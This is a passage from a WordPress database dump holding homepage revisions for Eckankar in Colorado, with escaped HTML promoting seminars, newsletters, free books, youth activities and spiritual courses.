data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-20 13:32:38','2023-11-20 20:32:38','',7160,'https://eckankar-colorado.org/?p=269407',0,'revision','',0),(269408,2,'2023-11-20 13:33:00','2023-11-20 20:33:00','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div 